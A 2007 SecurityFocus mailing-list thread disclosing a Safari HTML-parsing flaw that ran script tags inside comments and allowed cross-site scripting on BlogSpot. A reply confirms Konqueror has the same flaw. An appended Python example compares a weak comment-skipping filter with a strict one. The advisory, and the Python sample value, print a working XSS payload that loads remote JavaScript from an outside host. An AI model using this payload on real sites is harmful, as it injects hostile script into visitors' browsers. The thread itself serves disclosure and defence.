Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jan 23 2007 07:44AM
Jose Avila III (jose onzra com) (1 replies)
Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jan 24 2007 05:06AM
Robert Tasarz (robert tasarz greentech pl)
Jose Avila III wrote:
> Overview:
>
> Safari on occasions may improperly parse the source of an HTML document,
> which can lead to the execution of html tags within comments. This can
> become dangerous when input filters allow html tags within comments, as
> they will get parsed and executed under certain circumstances.
>
> Details:
>
> In some cases you can cause Apple's Safari browser to execute code when
> it should not be executed. In the following example everything within
> the comment, in theory, should never be executed; however, Safari decides
> to execute the script tag.
>
> <title>myblog<!--</title></head><body><script
> src=http://beanfuzz.com/bean.js> --></title>
>
> Blogs hosted on BlogSpot.com have filter mechanisms for their input;
> however, they will allow you to inject anything within comments. This
> made it possible to cross site script blogspot.com. Note: Only Safari
> viewers will be affected.
>
> Proof of concept: http://dirtybean1234.blogspot.com/
>
> Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99
>
> Vendor Response:
>
> I was unable to get a response from the vendor in regards to this issue.
>
> Questions / Comments:
> Jose (at) onzra (dot) com
>

As could be expected, the same problem exists in Konqueror (tested
v.3.5.5 on Debian GNU/Linux Sid).

regards,
Robert Tasarz
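
The filter weakness described in the advisory (markup inside comments is let through unchecked), shown beside a stricter check, as an added example that is not part of the original posts. The function names, the regular expressions and the tag allowlist are assumptions made for illustration; the sample value is constructed from the snippet quoted above.

```python
import html
import re

# Constructed input: the snippet quoted in the advisory, as a blog title field.
SAMPLE = ("myblog<!--</title></head><body><script "
          "src=http://beanfuzz.com/bean.js> -->")

COMMENT_RE = re.compile(r"<!--.*?-->", re.DOTALL)
TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")
ALLOWED_TAGS = {"b", "i", "em", "strong"}  # hypothetical allowlist


def weak_filter_accepts(value):
    """Filter of the kind described: comments are skipped before tag checks."""
    visible = COMMENT_RE.sub("", value)
    return all(t.lower() in ALLOWED_TAGS for t in TAG_RE.findall(visible))


def strict_filter_accepts(value):
    """Check tags everywhere, and reject comment delimiters outright."""
    if "<!--" in value or "-->" in value:
        return False
    return all(t.lower() in ALLOWED_TAGS for t in TAG_RE.findall(value))


def tags_hidden_in_comments(value):
    """Return tag names that appear inside comment spans (useful for logging)."""
    found = []
    for comment in COMMENT_RE.findall(value):
        found.extend(t.lower() for t in TAG_RE.findall(comment[4:-3]))
    return found


def render_title(value):
    """Text-only context such as <title>: escape, never pass markup through."""
    return "<title>" + html.escape(value, quote=True) + "</title>"
```

Escaping at output time is what removes the dependence on how a given browser tokenizes comments inside `<title>`; the input checks only decide what to reject or log.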

Copyright 2010, SecurityFocus